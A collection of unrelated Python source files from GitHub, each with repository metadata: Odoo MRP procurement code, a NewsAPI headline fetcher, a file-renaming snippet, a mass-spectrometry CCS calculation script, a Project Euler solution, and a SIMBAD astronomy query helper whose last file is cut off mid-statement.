'name': _('Generated from MO: ') + production.name,
'product_id': production.product_id.id,
'location_id': production.location_src_id.id,
'product_qty': production.product_qty,
'product_uom': production.product_uom.id}
proc = proc_obj.create(proc_vals)
date_planned = fields.Datetime.from_string(
production.date_planned).date()
warehouse = warehouse_obj.search([], limit=1)
plan_vals = {
'name': _('Generated from MO: ') + production.name,
'warehouse_id': warehouse.id,
'from_date': date_planned,
'to_date': date_planned,
'project_id': project.id,
'procurement_ids': [(4, proc.id)]}
plan = plan_obj.create(plan_vals)
production.plan = plan
proc._create_procurement_lower_levels(plan.id)
for procurement in plan.procurement_ids:
if procurement.show_button_create:
procurement.button_create_lower_levels()
|
odoomrp/odoomrp-wip
|
procurement_plan_mrp/models/mrp_production.py
|
mrp_production.py
|
py
| 3,308 |
python
|
en
|
code
| 119 |
github-code
|
6
|
24442654174
|
import argparse
import logging
import sys
import pandas as pd
import requests
key = ' '
def get_recent_headlines(key: str):
r = requests.get(url=f'https://newsapi.org/v2/top-headlines?country=us&apiKey={key}')
return r.json()
def get_headlines_to_certain_category(key: str, category: str):
r = requests.get(url=f'https://newsapi.org/v2/top-headlines?country=us&category={category}&apiKey={key}')
return r.json()
def json_to_dataframe(json):
return pd.DataFrame.from_dict(pd.json_normalize(json), orient='columns')
def get_news():
parser = argparse.ArgumentParser()
logging.basicConfig(level=logging.INFO)
parser.add_argument('--key', type=str, required=True, help='News API key, necessary to access the API')
parser.add_argument('--category', type=str, required=False, help='Category of news')
args = parser.parse_args()
# not null check
recent_news = get_recent_headlines(key=args.key)
logging.info('Request status: {}'.format(recent_news['status']))
logging.info(f'Fetched {recent_news["totalResults"]} new entries')
# drop rows with null values
recent_news = json_to_dataframe(recent_news['articles'])
recent_news = recent_news.dropna()
recent_news = recent_news.drop(columns=['urlToImage', 'publishedAt', 'source.id'])
if args.category is not None:
category_news = get_headlines_to_certain_category(key=args.key, category=args.category)
category_news = json_to_dataframe(category_news['articles'])
category_news = category_news.dropna()
category_news = category_news.drop(columns=['urlToImage', 'publishedAt', 'source.id'])
return recent_news, category_news
return recent_news
if __name__ == "__main__":
sys.exit(get_news())
|
novatc/sent-news
|
news_api.py
|
news_api.py
|
py
| 1,768 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72044818108
|
# RENAMING A FILE/FOLDER
# syntax:
# os.rename("path_of_file_with_oldname","path_of_file_with_newname")
os.rename("/home/hidayat7z/first.txt","/home/hidayat7z/phaast.txt")
# RENAMING MULTIPLE FILES
##for 2nd Sem_res.jpeg and 3rd Sem_res.jpeg RENAME it to 2nd Semester Result.jpeg & 3rd Semester Result.jpeg
## we need to make
# Sem_res.jpeg -> Semester Result.jpeg
##that means we need to make
# /home/hidayat7z/2nd Sem_res.jpeg -> /home/hidayat7z/2nd Semester Result.jpeg
#creating a list of the files
re_files=["/home/hidayat7z/2nd Sem_res.jpeg","/home/hidayat7z/3rd Sem_res.jpeg"]
for i in re_files:
j=i.split(" ")#splitting across a space
new_path=j[0]+' Semester Result.jpeg' # concatenating to get the new path
os.rename(i,new_path)
|
hidayat7z/Python
|
Manipulating Files and Folders/4. Renaming a file.py
|
4. Renaming a file.py
|
py
| 760 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73694875709
|
'''compute CCS in multi-step experiments
'''
import traceback
import time
import glob
import os
from pathlib import Path
from sys import platform as sys_pf
if sys_pf == 'darwin':
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
import seaborn as sns
from utils import *
from shortest_for_ccs import get_possible_ccs_values
import argparse
##########################################################################
# ArgumentParser
##########################################################################
parser = argparse.ArgumentParser()
parser.add_argument(
'--target_list_file', type=str, default='TargetList.txt',
help='Target list file (Tab-delimited text format)')
parser.add_argument(
'--config_file', type=str, default='config.xml',
help='Configuration file')
# parser.add_argument(
# '--data_folder', type=str, default='./',
# help='Data folder containing all the cef and meta data files')
parser.add_argument(
'--feature_files', type=str,
help='feature files to calibrate CCS values')
parser.add_argument(
'--framemeta_files', type=str,
help='frame meta info file for samples')
parser.add_argument(
'--output', type=str, default='ccs_table.tsv',
help='Output file to save a output table')
parser.add_argument(
'--r2_threshold', type=float, default=0.99,
help='threshold value for r2')
parser.add_argument(
'--num_isotopes_threshold', type=int, default=1,
help='threshold value for num_isotopes')
parser.add_argument(
'--intensity_rank_threshold', type=int, default=3,
help='threshold value for peak intensity rank in m/z window')
parser.add_argument(
'--threshold_n_fields', type=int, default=3,
help='threshold value for the minimum number of fields for linear regression')
parser.add_argument(
'--maxint', action='store_true',
help='select max intensive peaks for ccs computation')
parser.add_argument(
'--format', type=str, choices=['cef','mzmine'], default='mzmine',
help='file format for the features, e.g., cef or mzmine')
parser.add_argument(
'--output_dir', type=str, default='./',
help='a directory to store output files')
FLAGS = {}
##########################################################################
def get_metadata(mfile, offset, ax=None, label=None):
'''read metadata file and extract the field information for each frame
TODO: offset method (choose one frame by offset) or average in a range
Return
a pandas dataframe having a field information for each frame
'''
try:
metadata = pd.read_csv(mfile, sep='\t')
_list = list(metadata.drop_duplicates(subset='FrameMethodId').FrameId+offset-1)
filtered = metadata[metadata.FrameId.isin(_list)]
##################################################
if ax is not None:
ax[0].plot(metadata.FrameId, metadata.ImsTemperature, label=label)
ax[0].scatter(filtered.FrameId, filtered.ImsTemperature, label=None)
ax[0].set_ylabel('Temperature (C)')
ax[1].plot(metadata.FrameId, metadata.ImsPressure)
ax[1].scatter(filtered.FrameId, filtered.ImsPressure)
ax[1].set_ylabel('Pressure (torr)')
ax[2].plot(metadata.FrameId, metadata.ImsField)
ax[2].scatter(filtered.FrameId, filtered.ImsField)
ax[2].set_ylabel('E (V/cm)')
ax[2].set_xlabel('Frame ID')
##################################################
return filtered
except Exception as e:
return None
def get_target_info(target_list_file):
'''read the target_list_file
target_list_file: file path for a config file
Return
a pandas dataframe containing target information
'''
return pd.read_csv(target_list_file, sep='\t').fillna(method='ffill')
def get_adducts(exact_mass, adducts):
'''get the adducts mass
exact_mass: exact mass of the target
adducts: configuration for adducts in config_file
Return
adducts2mass: a dict containing information of positive and negative adducts
'''
adducts2mass = {'pos':{}, 'neg':{}}
for adduct in adducts:
charges = adduct['charges'].replace(' ','').split(',')
for c in charges:
charge = int(c)
name = '[M'+c+adduct['name']+']' if abs(charge)>1 else '[M'+c[0]+adduct['name']+']'
mass = (exact_mass + charge * adduct['mass'])/abs(charge)
if charge > 0:
adducts2mass['pos'][name] = (mass, charge)
elif charge < 0:
adducts2mass['neg'][name] = (mass, charge)
return adducts2mass
def get_features(file, max_normalize=True, fformat='cef'):
if fformat=='cef': return get_features_from_cef(file, max_normalize)
elif fformat=='mzmine': return get_features_from_mzmine_csv(file, max_normalize)
else: print('File format: {0}. This tool doesn\'t support this file format.'.format(fformat))
return None, None
def get_adducts_colors(adduct):
colors = {'[M+.]':'m',
'[M+H]':'b',
'[M+2H]':'c',
'[M+Na]':'r',
'[M+K]':'g',
'[M-H]':'y'}
if adduct in colors:
return colors[adduct]
else:
return 'k'
def is_in_tolerance(x, mass, ppm):
delta = mass * ppm * 1.0e-6
#print(mass, delta, mass-delta, mass+delta)
return (x >= mass - delta) & (x <= mass + delta)
def mass_error(x, mass):
return abs(x - mass) / mass * 1e6
def find_features_maxint(features, metadata, ion_mz, z, ppm):
df = features[is_in_tolerance(features.mz, ion_mz, ppm) & (features.z==z)]
if df.shape[0] == 0: return df
# if 'frame' column in metadata, delete it
if 'frame' in metadata.columns: del metadata['frame']
df = df.sort_values(by='intensity_z').drop_duplicates(subset='frame', keep='last')
df = df.merge(metadata, left_on='frame', right_on='FrameMethodId', how='inner')
df = df.sort_values(by='frame')
return df
def find_features(features, metadata, ion_mz, z, ppm,
threshold_num_isotopes=2,
threshold_intensity_rank=3):
if 'num_isotopes' in features.columns:
df = features[is_in_tolerance(features.mz, ion_mz, ppm) & \
(features.z==z) & \
(features.num_isotopes>=threshold_num_isotopes)]
else:
df = features[is_in_tolerance(features.mz, ion_mz, ppm) & (features.z==z)]
if df.shape[0] == 0: return df
# filter out small peaks by ranking threshold
rankings = df.groupby('frame')['intensity_org'].rank(ascending=False)
df = df[rankings<=threshold_intensity_rank]
# for f in frames_too_many_features:
# filter_by_intensity_rank(df, f, threshold_intensity_rank)
# if 'frame' column in metadata, delete it
if 'frame' in metadata.columns: del metadata['frame']
# df = df.sort_values(by='intensity_z').drop_duplicates(subset='frame', keep='last')
df = df.merge(metadata, left_on='frame', right_on='FrameMethodId', how='inner')
# df = df.sort_values(by='frame')
# df.to_csv("test_{0:.5f}.txt".format(ion_mz),sep="\t")
return df
def filter_by_intensity_rank(df, frame, threshold_intensity_rank=3):
temp = df[df.frame == frame]
# print(df)
# print(frame, temp.intensity_org)
np.argsort(temp.intensity_org)
def ccs_filter(ccs_list):
# remove the redundant regression lines which share the same start nodes(features)
first_peaks = []
last_peaks = []
for ccs in ccs_list:
first_peaks.append(int(ccs.mppid[0]))
last_peaks.append(int(ccs.mppid[-1]))
ufirst_peaks = list(np.unique(first_peaks))
ulast_peaks = list(np.unique(last_peaks))
if len(ufirst_peaks) < len(ccs_list):
print("len(ufirst_peaks) < len(ccs_list)", len(ufirst_peaks),len(ccs_list))
_ccs_list = []
for u in ufirst_peaks:
idx_list = np.where(first_peaks == u)[0]
if idx_list.shape[0] > 1:
best_r2 = 0
best_ccs_u = None
for ii in idx_list:
if (best_r2 < ccs_list[ii].r2):
best_ccs_u = ccs_list[ii]
best_r2 = ccs_list[ii].r2
if best_ccs_u != None:
_ccs_list.append(best_ccs_u)
else:
_ccs_list.append(ccs_list[idx_list[0]])
return _ccs_list
elif len(ulast_peaks) < len(ccs_list):
print("len(ulast_peaks) < len(ccs_list)", len(ulast_peaks),len(ccs_list))
print("ulast_peaks", ulast_peaks)
print("last_peaks", last_peaks)
_ccs_list = []
for u in ulast_peaks:
idx_list = np.where(last_peaks == u)[0]
print('idx_list',u, idx_list)
if idx_list.shape[0] > 1:
best_r2 = 0
best_ccs_u = None
for ii in idx_list:
if (best_r2 < ccs_list[ii].r2):
best_ccs_u = ccs_list[ii]
best_r2 = ccs_list[ii].r2
if best_ccs_u != None:
_ccs_list.append(best_ccs_u)
else:
_ccs_list.append(ccs_list[idx_list[0]])
return _ccs_list
else:
return ccs_list
# find the ccs values of earlist molecules
pass
def files_not_enough(fname, config_params, fformat='cef'):
# meta_file = (fname + '{0}.txt').format(config_params['suffix_meta'])
# if not os.path.isfile(meta_file):
# print("[ERROR] a metadata file doesn't exist:", meta_file)
# return True
for step in range(config_params['num_fields']):
if fformat=='cef': ffile = (fname + '{0}.cef').format(config_params['suffix_raw'].format(step+1))
else: ffile = (fname + '{0}.csv').format(config_params['suffix_raw'].format(step+1))
if not os.path.isfile(ffile):
print("[ERROR] a feature file doesn't exist:", ffile)
return True
return False
def get_ccs(FLAGS, comp_id, target_list, config_params):
'''
Return
a list
'''
ccs_results = []
# time_for_feature_finding = 0
# find the target files by the unique id for a compound
target_info = target_list[target_list.ID==comp_id]
if target_info.shape[0]==0: return ccs_results
# get file names for multiple runs
rep_files = target_info.RawFileName.tolist()
rep_files.sort()
num_reps = len(rep_files)
# get the unique information for each target
unique_target_info = target_info.drop(['RawFileName', 'FrameMetaName'], axis=1).drop_duplicates()
if unique_target_info.shape[0] > 1:
print("[ERROR] There are more than one targets for this comp_id. comp_id:{}, and unique_target_info:".format(comp_id))
print(unique_target_info)
compound_id = unique_target_info.iloc[0].CompoundID
exact_mass = unique_target_info.iloc[0].ExactMass
ionization = unique_target_info.iloc[0].Ionization
neutral_name = unique_target_info.iloc[0].CompoundName
print(compound_id, neutral_name, ionization, exact_mass)
# get adducts
adducts = get_adducts(target_info.ExactMass.tolist()[0], config_params['adducts'])[target_info.Ionization.tolist()[0]]
# get file informations
tdf = target_info[['RawFileName', 'FrameMetaName']].dropna()
if tdf.shape[0] == 0:
print("[ERROR] cannot find any metadata files for", comp_id)
return ccs_results
rawFile2Framemeta = pd.Series(tdf.FrameMetaName.values, index=tdf.RawFileName).to_dict()
print(rawFile2Framemeta)
##################################################
plt.close('all')
figs = {}
is_filled = {}
axis = {}
for adduct in adducts:
figs[adduct], axis[adduct] = plt.subplots(num_reps, sharex=True, sharey=True, figsize=(8,3*num_reps))
is_filled[adduct] = False
figs['meta'], axis['meta'] = plt.subplots(3, sharex=True, sharey=False, figsize=(8,8))
figs['intdist'], axis['intdist'] = plt.subplots(config_params['num_fields'], num_reps, sharex=True, sharey=False, figsize=(6*num_reps, 2*config_params['num_fields']))
##################################################
# compute CCS for each replicate
try:
for r, rep_file in enumerate(rep_files):
if files_not_enough(rep_file, config_params, FLAGS.format):
ccs_prop = dict()
tokens = comp_id.rsplit('_', 1)
ccs_prop['Compound_id'] = compound_id
ccs_prop['Ionization'] = ionization
ccs_prop['replicate'] = rep_file
ccs_prop['name'] = neutral_name
# ccs_prop['CAS'] = list(target_info.CAS)[0]
ccs_prop['comments'] = "couldn't find some files to compute CCS"
ccs_results.append(ccs_prop)
continue
# meta_file = (fname + '{0}.txt').format(config_params['suffix_meta'])
meta_file = rawFile2Framemeta[rep_file]
metadata = get_metadata(meta_file, config_params['frame_offset'], ax=axis['meta'], label=rep_file.split('/')[-1])
# collecting features
features = []
for step in range(config_params['num_fields']):
if FLAGS.format=='cef': ffile = (rep_file + '{0}.cef').format(config_params['suffix_raw'].format(step+1))
else: ffile = (rep_file + '{0}.csv').format(config_params['suffix_raw'].format(step+1))
_features, _ = get_features(ffile, fformat=FLAGS.format)
if _features.shape[0] > 0:
_features['frame'] = np.ones(_features.shape[0], dtype=np.int32) * (step+1)
features.append(_features)
## draw m/z vs intensity
if num_reps == 1:
ax = axis['intdist'][step]
else:
ax = axis['intdist'][step, r]
plot_intensity_distribution(_features, adducts, ax, config_params['mz_tolerance'])
else:
print("[ERROR] This file has no features: {0}".format(ffile))
if len(features) == 0: continue
features = pd.concat(features)
# compute CCS for each adducts
print("#"*150)
print("# features")
print("#"*150)
print(features)
print("features size:", features.shape)
for adduct in adducts:
adduct_mass, charge_state = adducts[adduct]
start_time = time.time()
if (FLAGS.maxint):
ccs_features_within_mz = find_features_maxint(features, metadata, adduct_mass, abs(charge_state), config_params['mz_tolerance'])
else:
ccs_features_within_mz = find_features(features, metadata, adduct_mass, abs(charge_state), config_params['mz_tolerance'],
threshold_num_isotopes=FLAGS.num_isotopes_threshold,
threshold_intensity_rank=FLAGS.intensity_rank_threshold)
if ccs_features_within_mz.shape[0] > 0:
print("#"*150)
print("# ccs_features_within_mz")
print("#"*150)
print(ccs_features_within_mz)
print("ccs_features_within_mz size:", ccs_features_within_mz.shape)
ccs_list = get_possible_ccs_values(ccs_features_within_mz,
adduct_mass,
abs(charge_state),
old_drift_tube_length=config_params['old_drift_tube_length'],
drift_tube_length=config_params['drift_tube_length'],
neutral_mass=config_params['neutral_mass'],
threshold_n_fields=FLAGS.threshold_n_fields,
threshold_r2=FLAGS.r2_threshold)
# filtering should be done based on ccs values of across all 3 replicates
# Note: i am not sure if r2 is a good metric to do this.
ccs_list = ccs_filter(ccs_list)
if len(ccs_list) > 0:
tokens = comp_id.rsplit('_', 1)
for ccs in ccs_list:
ccs_prop = ccs.to_dict()
print("[{0}] {1} ({2}), CCS: {3}({4})".format(comp_id, adduct, rep_file, ccs_prop['ccs'], ccs_prop['r2']))
ccs_prop['Compound_id'] = compound_id
ccs_prop['Ionization'] = ionization
ccs_prop['adduct'] = adduct
ccs_prop['replicate'] = rep_file
ccs_prop['name'] = neutral_name
ccs_results.append(ccs_prop)
if num_reps == 1:
_tmp_ax = axis[adduct]
else:
_tmp_ax = axis[adduct][r]
##################################################
plot_ccs_regression_lines2(
_tmp_ax,
adduct,
adduct_mass,
ccs_features_within_mz,
ccs_list,
title=Path(rep_file).name,
drift_tube_length=config_params['drift_tube_length'])
is_filled[adduct] = True
##################################################
##################################################
for adduct in adducts:
if is_filled[adduct]:
figs[adduct].tight_layout()
figs[adduct].savefig(FLAGS.output_dir+"/"+comp_id+"_"+adduct+".pdf", dpi=300)
axis['meta'][0].legend()
figs['meta'].tight_layout()
figs['meta'].savefig(FLAGS.output_dir+"/"+comp_id+"_meta.pdf", dpi=300)
figs['intdist'].tight_layout()
figs['intdist'].savefig(FLAGS.output_dir+"/"+comp_id+'_intensity_dist.pdf')
##################################################
except Exception as e:
traceback.print_exc()
if hasattr(e, 'strerror'):
print ("[ERROR]: {0} ({1})".format(e.strerror, rep_file))
else:
print ("[ERROR]: ", e)
# print('Total time for feature finding: {0} sec/compound(e.g., 3 reps and 6 adducts)'.format(time_for_feature_finding))
return ccs_results
def compute(df, ion_mz, config_params):
'''compute ccs
'''
params = {}
params['temp'] = df.ImsTemperature.tolist()
params['pressures'] = df.ImsPressure.tolist()
params['voltages'] = (df.ImsField*config_params['old_drift_tube_length']).tolist() ## 10.869 * (78.12 / 78.236) = 10.853 for correction
params['arrival_time'] = df.dt.tolist()
params['neutral_mass'] = config_params['neutral_mass']
params['drift_tube_length'] = config_params['drift_tube_length']
params['mz'] = ion_mz
# print(params)
ccs, prop = SteppedFieldCCS(params=params).compute()
# print("CCS:", ccs)
return prop
def plot_ccs_regression_lines(axis, adduct, adduct_mass, df, prop, title, drift_tube_length=78.236):
addmass = adduct_mass
color = get_adducts_colors(adduct)
p_v = df.ImsPressure / (df.ImsField * drift_tube_length)
p_vmax = p_v.max()
p_vmin = p_v.min()
axis.scatter(p_v, df.dt, c=color)
axis.text(0.05, 0.8, '{0} {1:.6f}'.format(adduct, addmass),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=15)
for r in df.itertuples():
axis.text((r.ImsPressure / (r.ImsField * drift_tube_length) + (p_vmax - p_vmin)/7), r.dt,
# '{0:.3f}ppm, {1:.2f}(z_score={2:.3f})'.format(mass_error(r.mass, addmass), r.intensity, r.intensity_z),
'{0:.3f}ppm, z_score={1:.2f}'.format(mass_error(r.mz, addmass), r.intensity_z),
color='k', fontsize=10)
axis.plot(p_v, 1000 * (prop['intercept'] + prop['slope']*p_v), 'r', label='fitted line')
axis.text(0.05, 0.65, 'r-squared:{0:.5f}'.format(prop['r_value']**2),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=15)
axis.text(0.05, 0.5, 'CCS:{0:.4f}'.format(prop['ccs']),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=15)
axis.set_title(title)
axis.set_xlabel('Pressure/Voltages (Torr/V)')
axis.set_ylabel('Arrival time (ms)')
# def plot_ccs_regression_lines2(axis, adduct, adduct_mass, df, prop, title, drift_tube_length=78.236):
def plot_ccs_regression_lines2(
axis,
adduct,
adduct_mass,
df,
ccs_list,
title,
drift_tube_length):
addmass = adduct_mass
color = get_adducts_colors(adduct)
p_v = df.ImsPressure / (df.ImsField * drift_tube_length)
p_vmax = p_v.max()
p_vmin = p_v.min()
pv_width = p_vmax - p_vmin
for r in df.itertuples():
axis.scatter(r.ImsPressure / (r.ImsField * drift_tube_length), r.dt,
c=color, s=1000*r.intensity, alpha=0.2)
axis.text(0.05, 0.8, '{0} {1:.5f}'.format(adduct, addmass),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=10)
for ccs in ccs_list:
prop = ccs.to_dict()
pv = [ccs.pressures[i] / (ccs.fields[i] * drift_tube_length) for i in range(len(ccs.pressures))]
dt_diff = [abs(ccs.arrival_time[i-1]-ccs.arrival_time[i]) for i in range(1,len(ccs.arrival_time))]
for i, f in enumerate(ccs.fields):
axis.text((pv[i] + (p_vmax - p_vmin)/7), ccs.arrival_time[i],
'{0:.3f}ppm, z_score={1:.2f}'.format(ccs.mass_ppm_error[i], ccs.intensity_z[i]),
color='k', fontsize=10)
# axis.scatter(pv[i], ccs.arrival_time[i], s=np.log(ccs.intensity_org[i]), c=color)
axis.scatter(pv[i], ccs.arrival_time[i], s=1000*ccs.intensity[i], c=color, alpha=0.8)
axis.text(min(pv)-2*(p_vmax - p_vmin)/7, min(ccs.arrival_time)-0.8*min(dt_diff),
'CCS:{0:.4f}(r2:{1:.5f})'.format(prop['ccs'], prop['r2']),
color='r', fontsize=10)
axis.plot(p_v, 1000 * (prop['intercept'] + prop['slope']*p_v), 'r', label='fitted line')
axis.set_title(title)
axis.set_xlim(left=p_vmin-pv_width*0.5, right=p_vmax+pv_width)
axis.set_xlabel('Pressure/Voltages (Torr/V)')
axis.set_ylabel('Arrival time (ms)')
def plot_intensity_distribution(features, adducts_mass, ax, ppm=50):
if features.shape[0] > 0:
ddata = np.log(features.intensity_org)
g = sns.kdeplot(ddata, shade=True, color="b", ax=ax)
ax.axvline(np.log(np.median(features.intensity_org)), linestyle=':')
ax.axvline(np.log(10*np.median(features.intensity_org)), linestyle=':')
ax.axvline(np.log(np.mean(features.intensity_org)+2*np.std(features.intensity_org)), linestyle='-.')
for adduct in adducts_mass:
sel = features[is_in_tolerance(features.mz, adducts_mass[adduct][0], ppm)]
if sel.shape[0] > 0:
ax.scatter(np.log(sel['intensity_org']), np.zeros(sel.shape[0]), c=get_adducts_colors(adduct))
ax.set_xlabel('log(Intensity)')
ax.set_ylabel('Density')
ax.set_xlim([np.min(ddata), np.max(ddata)])
def report(FLAGS, ccs_table, target_list):
if ccs_table.shape[0] == 0:
print("Unfortunately, we couldn't find any good CCS values.")
return
def get_stats_adduct(group):
return {'ccs_avg_adduct': group.mean(), 'ccs_rsd_adduct': 100*group.std()/group.mean(), 'ccs_count_adduct': group.count()}
def get_stats_file(group):
return {'ccs_count_file': group.count()}
ccs_avg = ccs_table.groupby(['Compound_id', 'adduct'])['ccs'].apply(get_stats_adduct).unstack()
ccs_table = pd.merge(ccs_table, ccs_avg.reset_index(), on=['Compound_id','adduct'], how='left')
ccs_count_file = ccs_table.groupby(['Compound_id', 'adduct', 'replicate'])['ccs'].apply(get_stats_file).unstack()
ccs_table = pd.merge(ccs_table, ccs_count_file.reset_index(), on=['Compound_id', 'adduct','replicate'], how='left')
print(ccs_table.head())
# save to a csv file after reordering the columns
cols = list(ccs_table.columns)
if 'ccs_avg_adduct' in cols:
cols.pop(cols.index('ccs_avg_adduct'))
else:
ccs_table['ccs_avg_adduct'] = np.nan
if 'ccs_rsd_adduct' in cols:
cols.pop(cols.index('ccs_rsd_adduct'))
else:
ccs_table['ccs_rsd_adduct'] = np.nan
cols.pop(cols.index('Compound_id'))
cols.pop(cols.index('Ionization'))
cols.pop(cols.index('adduct'))
cols.pop(cols.index('ccs'))
cols.pop(cols.index('adduct_mz'))
cols.pop(cols.index('name'))
newcols = ['Compound_id','name','Ionization','adduct','adduct_mz','ccs_avg_adduct','ccs_rsd_adduct','ccs']+cols
df = ccs_table[newcols]
# df = ccs_table
df.to_csv(FLAGS.output_dir+'/'+FLAGS.output, sep='\t')
def multi(FLAGS, config_params):
if FLAGS.ppm: config_params['mz_tolerance'] = FLAGS.ppm
os.makedirs(FLAGS.output_dir, exist_ok=True)
# read a list of targets
if FLAGS.target_list_file.endswith('.csv'):
target_list = pd.read_csv(FLAGS.target_list_file)
else: target_list = pd.read_csv(FLAGS.target_list_file, sep='\t')
num_targets = target_list.shape[0]
if "Ionization" not in target_list.columns:
target_list = pd.concat([target_list]*2, ignore_index=True)
target_list['Ionization'] = ['pos']*num_targets+['neg']*num_targets
target_list['ID']= target_list.CompoundID.str.cat("_"+target_list.Ionization)
target_list = target_list.fillna(method='ffill')
# find RawFileName
import re
suffix_header = config_params['suffix_raw'].split('{',1)[0]
print(suffix_header)
uniqueIDs = set(target_list.UniqueID4DfileNames.drop_duplicates().tolist())
print(uniqueIDs)
if ("RawFileName" not in target_list.columns) or ("FrameMetaName" not in target_list.columns):
feature_files = set(glob.glob(FLAGS.feature_files))
framemeta_files = set(glob.glob(FLAGS.framemeta_files))
uniqueIDs_list = []
for _f in feature_files:
for uid in uniqueIDs:
if bool(re.search('[-_]?{}[-_]'.format(uid), _f)):
if bool(re.search('[-_]?pos[-_]', _f.lower())):
_ion = 'pos'
else:
_ion = 'neg'
print(_f, uid, _ion)
# prefix of file names
filename = os.path.basename(_f).split(suffix_header)[0]
framemeta_name = ""
for framemeta in framemeta_files:
if filename in framemeta:
framemeta_name = framemeta
prefix = _f.split(suffix_header)[0]
uniqueIDs_list.append({'RawFileName':prefix, 'FrameMetaName':framemeta_name, 'uid':uid, 'ionizations':_ion})
# break
print(uniqueIDs_list)
tdf = pd.DataFrame(uniqueIDs_list).drop_duplicates()
target_list = target_list.merge(tdf, left_on=['Ionization','UniqueID4DfileNames'], right_on=['ionizations','uid'])
del target_list['ionizations']
del target_list['uid']
# target_list.to_csv('temp.csv')
## e.g., S00001.b if you have a same compound id but different versions.
# num_comp = list(pd.DataFrame(target_list.CompoundID.str.split('\.').tolist(), columns = ['CompoundID','ver']).CompoundID.drop_duplicates())
compound_ids = target_list.ID.drop_duplicates().tolist()
num_pos = (target_list.drop_duplicates(subset='ID').Ionization=='pos').sum()
num_neg = (target_list.drop_duplicates(subset='ID').Ionization=='neg').sum()
# compounds
assert len(compound_ids) == num_pos+num_neg,\
"Please check if there are duplicates in CompoundID and its Ionization"
print('Number of compounds: {0} (pos:{1}, neg:{2})'.format(len(compound_ids), num_pos, num_neg))
print(compound_ids)
ccs_results = []
start_time = time.time()
for cid in compound_ids:
# compute ccs for this compound
ccs_results += get_ccs(FLAGS, cid, target_list, config_params)
print('[{0}] {1:.2f} sec'.format(cid, (time.time()-start_time)))
print('Total time: {0:.2f} sec/compound(e.g., 3 reps)'.format((time.time()-start_time)/len(compound_ids)))
ccs_table = pd.DataFrame(ccs_results)
report(FLAGS, ccs_table, target_list)
if __name__ == '__main__':
FLAGS = parser.parse_args()
print("options:", FLAGS)
# read a set of configuration parameters
config_params = get_config(FLAGS.config_file)
print(config_params)
multi(FLAGS, config_params)
|
PNNL-Comp-Mass-Spec/AutoCCS
|
multiCCS.py
|
multiCCS.py
|
py
| 29,722 |
python
|
en
|
code
| 7 |
github-code
|
6
|
34131786759
|
import time
import numpy as np
def isleapyear(year):
if year%4==0:
if year%100==0:
if year%400==0:
return True
elif year%400!=0:
return False
else:
return True
return False
if __name__ == '__main__':
num_sunday = 0
year = 1900
monthsdsnonleap = {'January':31,'February':28,'March':31,
'April':30,'May':31,'June':30,
'July':31,'August':31,'September':30,
'October':31,'November':30,'December':31}
monthsdsleap = {'January':31,'February':29,'March':31,
'April':30,'May':31,'June':30,
'July':31,'August':31,'September':30,
'October':31,'November':30,'December':31}
stime = time.time()
numdays = 365
firstofeachmonth = [1]
monthsds = monthsdsnonleap
months = list(monthsds.keys())
for m in months[:-1]:
firstofeachmonth.append((firstofeachmonth[-1]+monthsds[m]%7)%7)
firstofeachmonth = dict(zip(months,firstofeachmonth))
#print(firstofeachmonth)
firstofeachmonth = [(firstofeachmonth['December']+monthsds['December']%7)%7]
#print(firstofeachmonth)
year = 1901
while year<=2000:
#print(isleapyear(year),year)
if isleapyear(year):
monthsds = monthsdsleap
else:
monthsds = monthsdsnonleap
for m in months[:-1]:
firstofeachmonth.append((firstofeachmonth[-1]+monthsds[m]%7)%7)
#print(monthsds[m],firstofeachmonth)
firstofeachmonth = dict(zip(months,firstofeachmonth))
#print(np.count_nonzero(np.array(list(firstofeachmonth.values()))==0))
num_sunday += np.count_nonzero(np.array(list(firstofeachmonth.values()))==0)
year +=1
firstofeachmonth = [(firstofeachmonth['December']+monthsds['December']%7)%7]
print(num_sunday)
print("Time taken :: %.3f seconds"%(time.time()-stime))
|
sadimanna/project_euler
|
p19.py
|
p19.py
|
py
| 1,760 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71791936828
|
from unittest import result
import pyvo as vo
import numpy as np
import pandas as pd
import re
from typing import Optional, Tuple
def simbad_tap():
return vo.dal.TAPService("http://simbad.u-strasbg.fr/simbad/sim-tap")
def clean_str(obj_id: str) -> str:
return ' '.join(obj_id.split())
def fetch_catalog_id(ids: str, catalog_identifier: str, verbose: bool = False):
try:
return re.findall(f'(?<={catalog_identifier} )\d+', ids)[0]
except IndexError:
if verbose:
print(f'No {catalog_identifier} id for ids={ids}...')
return np.nan
def resolve_name(obj_identifier: str) -> Tuple[Optional[float], Optional[float], Optional[float]]:
service = simbad_tap()
try:
resultset = service.search(f'''select ra, dec, plx_value, pmra, pmdec, rvz_radvel
from basic where main_id='{obj_identifier}'
''').to_table().to_pandas().values
if len(resultset) == 1:
return tuple(resultset[0, :])
else:
return None, None, None, None, None, None
except Exception as e:
print(f'Exception while querying: {e}')
return None, None, None, None, None, None
def fetch_object_children(obj_identifier: str) -> pd.DataFrame:
service = simbad_tap()
resultset = service.search(f'''
SELECT main_id as child, oid, link_bibcode, membership,
ra, dec, coo_bibcode,
plx_value, plx_err, plx_bibcode,
pmra, pmdec, pm_err_maj_prec, pm_bibcode,
rvz_radvel, rvz_err, rvz_bibcode, ids.ids
from h_link JOIN ident as p on p.oidref=parent JOIN basic on oid=child JOIN ids on ids.oidref=child
WHERE p.id = '{obj_identifier}' and (membership >=95 or membership is null);''')
obj_ids = resultset['child'].data
oids = resultset['oid'].data
bibcodes = resultset['link_bibcode'].data
ras = resultset['ra'].data
decs = resultset['dec'].data
coo_bibcodes = resultset['coo_bibcode'].data
plx_values = resultset['plx_value'].data
plx_errs = resultset['plx_err'].data
plx_bibcodes = resultset['plx_bibcode'].data
pmras = resultset['pmra'].data
pmdecs = resultset['pmdec'].data
pm_errs = resultset['pm_err_maj_prec'].data
pm_bibcodes = resultset['pm_bibcode'].data
radvels = resultset['rvz_radvel'].data
rvz_errs = resultset['rvz_err'].data
rvz_bibcodes = resultset['rvz_bibcode'].data
ids = resultset['ids'].data
data = np.array([
np.array(list(map(clean_str, obj_ids))),
oids.astype(int),
bibcodes,
